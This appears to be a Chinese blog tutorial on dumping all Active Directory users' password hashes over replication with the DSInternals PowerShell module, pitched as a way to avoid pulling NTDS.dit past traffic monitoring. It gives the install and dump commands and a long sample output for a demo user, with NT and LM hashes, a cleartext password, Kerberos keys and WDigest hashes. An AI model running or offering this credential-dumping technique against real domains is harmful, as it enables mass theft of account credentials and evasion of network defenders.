Powershell快速导出域HASH(DSInternals)

简述

我们都知道域NTDS.dit文件域用户越多文件越大,我见过的ntds文件起码以G为单位,把ntds大文件拉回到本地实属不便,并且易被流量监控设备发觉

DSInternals使用方法

1、PowerShell 5.0:

1
Install-Module DSInternals

2、PowerShell 3.0、4.0
解压压缩包

1
2
3
cd C:\test\DSInternals

Import-Module .\DSInternals

导出所有域用户HASH

1
Get-ADReplAccount -All -NamingContext 'DC=Adatum,DC=com' -Server LON-DC1

示例图
如上图过W+用户,ntds文件绝壁超过G,导出域hash才200左右MB
该工具有许多模块,需要自行官网查看

输出内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
DistinguishedName: CN=April Reagan,OU=IT,DC=Adatum,DC=com
Sid: S-1-5-21-3180365339-800773672-3767752645-1375
Guid: 124ae098-699b-4450-a47a-314a29cc90ea
SamAccountName: April
SamAccountType: User
UserPrincipalName: April@adatum.com
PrimaryGroupId: 513
SidHistory:
Enabled: True
Deleted: False
LastLogon:
DisplayName: April Reagan
GivenName: April
Surname: Reagan
Description:
NTHash: 92937945b518814341de3f726500d4ff
LMHash: 727e3576618fa1754a3b108f3fa6cb6d
NTHashHistory:
Hash 01: 92937945b518814341de3f726500d4ff
Hash 02: 1d3da193d2f45911a6f0fa940b9fb32f
Hash 03: 402bc59d8a00641b7f386e78596340f4
LMHashHistory:
Hash 01: 727e3576618fa1754a3b108f3fa6cb6d
Hash 02: 5a5503d0e85f58abaad3b435b51404ee
Hash 03: f9393d97e7a1873caad3b435b51404ee
SupplementalCredentials:
ClearText: Pa$$w0rd
Kerberos:
Credentials:
DES_CBC_MD5
Key: 76fe3b5bda911a40
OldCredentials:
DES_CBC_MD5
Key: 7f8c4f38e0ea0b80
Salt: ADATUM.COMApril
Flags: 0
KerberosNew:
Credentials:
AES256_CTS_HMAC_SHA1_96
Key: 3a3b6a89bb82d112db5ef68f6db5d1afc2b806df61dcd85e3eacf3b85ee382d8
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: a72c8bc96c4a6f03244f0b0067a1e440
Iterations: 4096
DES_CBC_MD5
Key: 76fe3b5bda911a40
Iterations: 4096
OldCredentials:
AES256_CTS_HMAC_SHA1_96
Key: 14e46244a59a37cd8aa7c1fe61896441c7d065fafe4874191e69c1fe28856810
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 034b512ec64286dec951d6aff8d81fa8
Iterations: 4096
DES_CBC_MD5
Key: 7f8c4f38e0ea0b80
Iterations: 4096
OlderCredentials:
AES256_CTS_HMAC_SHA1_96
Key: 2387ca8f936c8c154996809af8fee7c47fe4b9b5dd84d051fc43a9289bbaa3ab
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 29d536ec057f9063747161429b81f056
Iterations: 4096
DES_CBC_MD5
Key: 58f1cbe6e50e1f83
Iterations: 4096
ServiceCredentials:
Salt: ADATUM.COMApril
DefaultIterationCount: 4096
Flags: 0
WDigest:
Hash 01: c3d012ab1101eb8f51b483fb4c5f8a7e
Hash 02: c993da396914645b356ae7816251fcb1
Hash 03: 6b58530cab34de91189a603e22c2be15
Hash 04: c3d012ab1101eb8f51b483fb4c5f8a7e
Hash 05: 5a762cf59fa31023dcba1ebd4725b443
Hash 06: c78bac91c0ba25cae5d44460fd65a73b
Hash 07: 59d73cea16afd1aac6bf8acfa2768621
Hash 08: d2be383db9469a39736d9e2136054131
Hash 09: 079de9f4d94d97a80f1726497dfd1cc2
Hash 10: 85dbe1549d5fbfcc91f7fe5ac5910f52
Hash 11: 961a36bded5535b8fc15b4b8e6c48b93
Hash 12: 6ac8a60d83e9ae67c2097db716a6af17
Hash 13: e899e577d5f81ef5288ab67de07fad9a
Hash 14: 135452ab86d40c3d47ca849646d5e176
Hash 15: a84c367eaa334d0a4cb98e36da011e0f
Hash 16: 61a458eb70440b1a92639452f0c2c948
Hash 17: 238f4059776c3575be534afb46be4ccf
Hash 18: 03ddf370064c544e9c6dbb6ccbf8f4ac
Hash 19: 354dd6c77ccf35f63e48cd5af6473ccf
Hash 20: 5f9800d734ebe9fb588def6aaafc40b7
Hash 21: 59aab99ebcddcbf13b96d75bb7a731e3
Hash 22: f1685383b0c131035ae264ee5bd24a8d
Hash 23: 3119e42886b01cad00347e72d0cee594
Hash 24: ebef7f2c730e17ded8cba1ed20122602
Hash 25: 7d99673c9895e0b9c484e430578ee78e
Hash 26: e1e20982753c6a1140c1a8241b23b9ea
Hash 27: e5ec1c63e0e549e49cda218bc3752051
Hash 28: 26f2d85f7513d73dd93ab3afd2d90cf6
Hash 29: 84010d657e6b58ce233fae2bd7644222

参考文章